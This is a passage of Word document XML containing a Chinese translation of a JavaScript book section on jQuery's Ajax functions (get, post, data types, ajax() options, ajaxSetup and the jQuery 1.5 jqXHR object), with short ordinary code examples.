        <w:t>的服务器脚本一起才能工作。由于</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>被当做脚本来处理，因此这意味着</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的数据可以跨域请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para08"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()</w:t>
      </w:r>
      <w:r>
        <w:t>获取指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，如果有数据的话，还可传入指定数据，最后则将结果传递给指定的回调函数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP GET</w:t>
      </w:r>
      <w:r>
        <w:t>请求来实现，</w:t>
      </w:r>
      <w:r>
        <w:t>jQ</w:t>
      </w:r>
      <w:r>
        <w:t>uery.post()</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:t>请求，其他两者则都是一样的。与</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>一样，这两个方法也接受相同的三个参数：必需的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，可选的数据字符串或对象，以及一个技术上可选但实际上总会使用的回调函数。调用的回调函数会被传入三个参数：第一个参数是返回的数据；第二个是</w:t>
      </w:r>
      <w:r>
        <w:t>"success"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串；第三个则是</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象（如果有的话）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>从服务器请求文本并在警告对话框中显示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.get("debug.txt",alert);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了上面描述的三个参数，还</w:t>
      </w:r>
      <w:r>
        <w:t>有两个方法接受可选的第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数（如果省略数据参数的话，则作为第三个参数传入），该参数指定被请求数据的类型。第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数会影响在传入回调函数前数据的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>处理。</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用</w:t>
      </w:r>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
      <w:r>
        <w:t>类型，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>类型，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>则使用</w:t>
      </w:r>
      <w:r>
        <w:t>"json"</w:t>
      </w:r>
      <w:r>
        <w:t>类型。与上面这些专用函数相比，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()</w:t>
      </w:r>
      <w:r>
        <w:t>更灵活。该参数的有效值，以及省略该参数时</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的行为，在下面描述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ge</w:t>
      </w:r>
      <w:r>
        <w:t>t()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()</w:t>
      </w:r>
      <w:r>
        <w:t>传递下面</w:t>
      </w:r>
      <w:r>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>种类型作为参数。此外，下面会讲到，使用</w:t>
      </w:r>
      <w:r>
        <w:t>dataType</w:t>
      </w:r>
      <w:r>
        <w:t>选项也可以传递这些类型给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将服务器的响应作为纯文本返回，不做任何处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"html"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>该类型和</w:t>
      </w:r>
      <w:r>
        <w:t>"text"</w:t>
      </w:r>
      <w:r>
        <w:t>一样：响应是纯文本。</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法使用该类型，将返回的文本插入到文档自身中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"xml"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>被认为指向</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>格式的数据，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>responseXML</w:t>
      </w:r>
      <w:r>
        <w:t>属性来替代</w:t>
      </w:r>
      <w:r>
        <w:t>responseText</w:t>
      </w:r>
      <w:r>
        <w:t>属性。传给回调函</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数的值是一个表示该</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档的</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象，而不是保存文档文本的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>被认为指向</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>文件，返回的文本在传入回调函数前，会当做脚本执行。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>使用该类型。当类型是</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>可以使用＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来替代</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象，因</w:t>
      </w:r>
      <w:r>
        <w:t>此可以处理跨域请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"json"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>被认为指向</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的数据文件。会使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.parseJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>（参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.7</w:t>
      </w:r>
      <w:r>
        <w:t>节）来解析返回的内容，得到</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>对象后传入回调函数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>使用该类型。如果类型是</w:t>
      </w:r>
      <w:r>
        <w:t>"json"</w:t>
      </w:r>
      <w:r>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>或数据字符串含有</w:t>
      </w:r>
      <w:r>
        <w:t>"=?"</w:t>
      </w:r>
      <w:r>
        <w:t>，该类型会转换成</w:t>
      </w:r>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>"jsonp"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>请求的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>被认为指向服务器脚本，该脚本支持</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>协议，可以将</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式的数据作为参数传递给客户端指定的函数。（</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>的更多细节请参考</w:t>
      </w:r>
      <w:r>
        <w:t>18.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。）在该类型下，</w:t>
      </w:r>
      <w:r>
        <w:t>传递给回调函数的是解析好的对象。由于</w:t>
      </w:r>
      <w:r>
        <w:t>JSONP</w:t>
      </w:r>
      <w:r>
        <w:t>请求可以通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素来实现，因此该类型可以用来做跨域请求，就和</w:t>
      </w:r>
      <w:r>
        <w:t>"script"</w:t>
      </w:r>
      <w:r>
        <w:t>类型一样。使用该类型</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>或数据字符串经常会包含一个类似</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>jsonp=?"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>callback=?"</w:t>
      </w:r>
      <w:r>
        <w:t>的参数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会将参数中的</w:t>
      </w:r>
      <w:r>
        <w:t>“?”</w:t>
      </w:r>
      <w:r>
        <w:t>替换为自动产生的回调函数名。（可以参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“3.</w:t>
      </w:r>
      <w:r>
        <w:t>不常用的选项和钩子</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>节中的</w:t>
      </w:r>
      <w:r>
        <w:t>jsonp</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jsonpCallback</w:t>
      </w:r>
      <w:r>
        <w:t>选项来做替代。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>函数时没有指定以上类型中的任何一个，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会检查</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>响应中的</w:t>
      </w:r>
      <w:r>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:t>头。如果该头部信息包含</w:t>
      </w:r>
      <w:r>
        <w:t>"xml"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，则传入回调函数中的是</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档。否则，如果头部包含</w:t>
      </w:r>
      <w:r>
        <w:t>"json"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，则数据被被解析成</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>并把解析后的对象传给回调函数。否则，如果头部含有</w:t>
      </w:r>
      <w:r>
        <w:t>"javascript"</w:t>
      </w:r>
      <w:r>
        <w:t>字符串，则数据被当做脚本执行。如果以上都不符合，则数据会被当做纯文本处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="494" w:name="19_6_3_jQuery_ajax__Han_Shu_"/>
      <w:r>
        <w:t>19.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="494"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具最后都会调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()——</w:t>
      </w:r>
      <w:r>
        <w:t>这是整个类库中</w:t>
      </w:r>
      <w:r>
        <w:t>最复杂的函数。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>仅接受一个参数：一个选项对象，该对象的属性指定</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求如何执行的很多细节。例如，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.getScript(url,callback)</w:t>
      </w:r>
      <w:r>
        <w:t>与以下</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>的调用等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.ajax({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>type:"GET",//HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>url:url,//</w:t>
      </w:r>
      <w:r>
        <w:t>要获取数据的</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data:null,//</w:t>
      </w:r>
      <w:r>
        <w:t>不给</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>添加任何数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>dataType:"script",//</w:t>
      </w:r>
      <w:r>
        <w:t>一旦获取到数据，立刻当做脚本执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>success:callback//</w:t>
      </w:r>
      <w:r>
        <w:t>完成时调用该函数</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jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()</w:t>
      </w:r>
      <w:r>
        <w:t>也接受上面这</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个基本选项。然而，如果直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>的话，它可以支持更多其他选项。下面会解释所有选项（包含上面这</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>个基本选项）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在深入了解所有选项之前，我们得知道可以通过给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajaxSetup()</w:t>
      </w:r>
      <w:r>
        <w:t>传入一个选项对象来设置任意选项的默认值：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery.ajaxSetup({</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>timeout:2000,//</w:t>
      </w:r>
      <w:r>
        <w:t>在两秒后取消所有</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>cache:false//</w:t>
      </w:r>
      <w:r>
        <w:t>通过给</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>添加时间戳来禁用浏览器缓存</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运行以上代码后，指定的</w:t>
      </w:r>
      <w:r>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>cache</w:t>
      </w:r>
      <w:r>
        <w:t>选项会在所有未指定这两个选项的值的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>请求中使用（包括</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>load()</w:t>
      </w:r>
      <w:r>
        <w:t>方法等高级工具）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在阅读下面章节中</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的大量选项和回调函数时，参考</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.1</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>19.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节下面的</w:t>
      </w:r>
      <w:r>
        <w:t>“3.jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.post()”</w:t>
      </w:r>
      <w:r>
        <w:t>节中关于</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>状态码和数据类型字符串的内容会非常有裨益。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>jQuery 1.5</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在本书即将交付印刷时，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1</w:t>
      </w:r>
      <w:r>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:t>发布了。在</w:t>
      </w:r>
      <w:r>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:t>版本中，重写了</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>模块，提供一些非常便捷的新特性。最重要的一个特性是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.ajax()</w:t>
      </w:r>
      <w:r>
        <w:t>和所有之前描述的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具函数现在都返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>jqXHR</w:t>
      </w:r>
      <w:r>
        <w:t>对象。该对象模拟</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，甚至对于那些没有使用</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>对象的请求（比如</w:t>
      </w:r>
      <w:r>
        <w:t>$.getScript()</w:t>
      </w:r>
      <w:r>
        <w:t>发起的请求）也进行了模拟。更进一步的是，</w:t>
      </w:r>
      <w:r>
        <w:t>jqXHR</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>success()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>error()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，可用来注册请求成功或失败时的回调函数。例如，不用给</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery.get()</w:t>
      </w:r>
      <w:r>
        <w:t>传递回调函数，只须将</w:t>
      </w:r>
      <w:r>
        <w:t>回调函数传递给工具函数返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jqXHR</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>success()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
